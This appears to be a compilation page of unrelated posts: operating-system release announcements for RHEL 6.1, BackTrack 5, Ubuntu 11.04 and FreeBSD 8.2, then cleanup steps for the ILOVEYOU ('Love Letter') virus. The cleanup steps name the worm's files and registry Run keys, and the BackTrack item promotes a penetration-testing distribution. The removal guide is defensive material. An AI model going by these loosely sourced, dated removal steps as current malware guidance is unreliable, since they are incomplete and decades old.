Red Hat Enterprise Linux 6.1 is now available for Download

Red Hat Enterprise Linux 6.1 is now available .

Enhancements provide improvements in system reliability, scalability and performance, coupled with support for upcoming system hardware.

This release also delivers patches and security updates, while maintaining application compatibility and OEM/ISV certifications.

In addition to performance improvements, Red Hat Enterprise Linux 6.1 also provides numerous technology updates, including:

Additional configuration options for advanced storage configurations with improvements in FCoE, Datacenter Bridging and iSCSI offload, which allow networked storage to deliver the quality of service commonly associated with directly connected storage
Enhancements in virtualization, file systems, scheduler, resource management and high availability
New technologies that enable smoother enterprise deployments and tighter integration with heterogeneous systems
A technology preview of Red Hat Enterprise Identity (IPA) services, based on the open source FreeIPA project
Support for automatic failover for virtual machines and applications using the Red Hat High Availability Add-On
Integrated developer tools that provide the ability to write, debug, profile and deploy applications without leaving the graphical environment
Improvements to network traffic processing to leverage multi-processor servers that are getting increasingly common.
Red Hat Enterprise Linux 6.1 is already established as a performance leader serving both as a virtual machine guest and hypervisor host in SPECvirt benchmarks.

Red Hat and HP recently announced that the combination of Red Hat Enterprise Linux with KVM running on a HP ProLiant BL620c G7 20-core Blade server delivered a record-setting SPECvirt_sc2010 benchmark result.

“Building on our decade-long partnership to optimize Red Hat Enterprise Linux for IBM platforms, our companies have collaborated closely on the development of Red Hat Enterprise Linux 6.1,” said Jean Staten Healy, director, Cross-IBM Linux and Open Virtualization.

“Red Hat Enterprise Linux 6.1 combined with IBM hardware capabilities offers our customers expanded flexibility, performance and scalability across their bare metal, virtualized and cloud environments. Our collaboration continues to drive innovation and leading results in the industry," Healy added.

BackTrack 5 Release on May 10th NO.1 Hackers OS

For all those who haven’t heard, BackTrack 5 will be released in 5 days. So far, we are on schedule and the whole team is excited by the release. The 10th will be a hectic day for us, so we thought we’d start putting out some information about BackTrack 5 ahead of time – to reduce our load on the release day.

We know that there are probably many questions about BackTrack, to answer some of your questions here are some exciting points:

Our release will start on May 10th (don’t bug us about the timezone), and will primarily be available for download via torrents. This is to reduce the massive load on our mirrors for the first few hours.
As time progresses into the release , we will then allow direct downloads from our mirrors.
We will have KDE (4.6) and Gnome (2.6) Desktop environment flavours
32 and 64 bit support
A basic ARM BackTrack image which can be chrooted into from android enabled devices. (hopefully released May 10th)
The 32 and 64 bit images support “Forensics Mode”, which boots a forensically sound instance of BackTrack and “Stealth mode”, which boots without generating network traffic.
All support for Backtrack 4 will end on May 10th, 2011 and BackTrack 4 will not be available for download from our official mirrors from that date onwards.
And yes, Metasploit 3.7.0 *was* packaged into BT5.

We are all looking forward towards the release, and will resurface from our bunkers on May 10th … Bring on the Revolution!

Download Ubuntu 11.04 Desktop CD
------------------------------------------

The desktop CD allows you to try Ubuntu without changing your computer at all, and at your option to install it permanently later. This type of CD is what most people will want to use. You will need at least 256MiB of RAM to install from this CD.
There are four images available, each for a different type of computer:

For almost all PCs. This includes most machines with Intel/AMD/etc type processors and almost all computers that run Microsoft Windows, as well as newer Apple Macintosh systems based on Intel processors. Choose this if you are at all unsure.
Choose this to take full advantage of computers based on the AMD64 or EM64T architecture (e.g., Athlon64, Opteron, EM64T Xeon, Core 2). If you have a non-64-bit processor made by AMD, or if you need full support for 32-bit code, use the Intel x86 images instead.
Choose this to take full advantage of computers based on the AMD64 or EM64T architecture (e.g., Athlon64, Opteron, EM64T Xeon). If you have a non-64-bit processor made by AMD, or if you need full support for 32-bit code, use the Intel x86 images instead. This image is adjusted to work properly on Mac systems.
For Apple Macintosh G3, G4, and G5 computers, including iBooks and PowerBooks as well as IBM OpenPower machines. Warning: This image is oversized (which is a bug) and will not fit onto a standard 700MiB CD. However, you may still test it using a DVD, a USB drive, or a virtual machine.

A full list of available files can be found below.
If you need help burning these images to disk, see the CD Burning Guide.

FreeBSD 8.2-RELEASE Hackers OS

FreeBSD 8.2-RELEASE is now available for the amd64, i386, ia64, pc98, powerpc, and sparc64 architectures.
FreeBSD 8.2 can be installed from bootable ISO images or over the network. Some architectures (currently amd64 and i386) also support installing from a USB memory stick. The required files can be downloaded via FTP or BitTorrent as described in the sections below. While some of the smaller FTP mirrors may not carry all architectures, they will all generally contain the more common ones such as amd64 and i386.
MD5 and SHA256 hashes for the release ISO images are included at the bottom of this message.
The purpose of the images provided as part of the release are as follows:
dvd1
This contains everything necessary to install the base FreeBSD operating system, a collection of pre-built packages, and the documentation. It also supports booting into a "livefs" based rescue mode. This should be all you need if you can burn and use DVD-sized media.

disc1
This contains the base FreeBSD operating system and the documentation packages for CDROM-sized media. There are no other packages.
livefs
This contains support for booting into a "livefs" based rescue mode but does not support doing an install from the CD itself. It is meant to help rescue an existing system but could be used to do a network based install if necessary.
bootonly
This supports booting a machine using the CDROM drive but does not contain the support for installing FreeBSD from the CD itself. You would need to perform a network based install (e.g. from an FTP server) after booting from the CD.
memstick
This can be written to an USB memory stick (flash drive) and used to do an install on machines capable of booting off USB drives. It also supports booting into a "livefs" based rescue mode. The documentation packages are provided but no other packages.

HOW TO REMOVE THE LOVE LETTER VIRUS TO UR PC

----------------------------
To Stop LOVE-LETTER-FOR-YOU
----------------------------

Go to Task Manager
stop process WSCRIPT.exe

delete these files wherever you find them:
LOVE-LETTER*.*
MSKernel32.vbs
Win32DLL.vbs
WIN-BUGSFIX.exe (probably not there)

------------
search for all *.vbs files created today on all drives
Any that are 11K are definitely infected.
All .vbs and .vbe files have probably been overwritten and lost.

------------
Anybody with MIRC has had a script.ini file created in default MIRC directory with virus.

------------
Will need to fix registry entries as well,

Delete these registry entries:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Wi n32DLL

more to come?....
--------

Home/Start page for Inet explorer changed, looks like no harm because site it points to has been taken down.
--------

Rebooting will not cure!
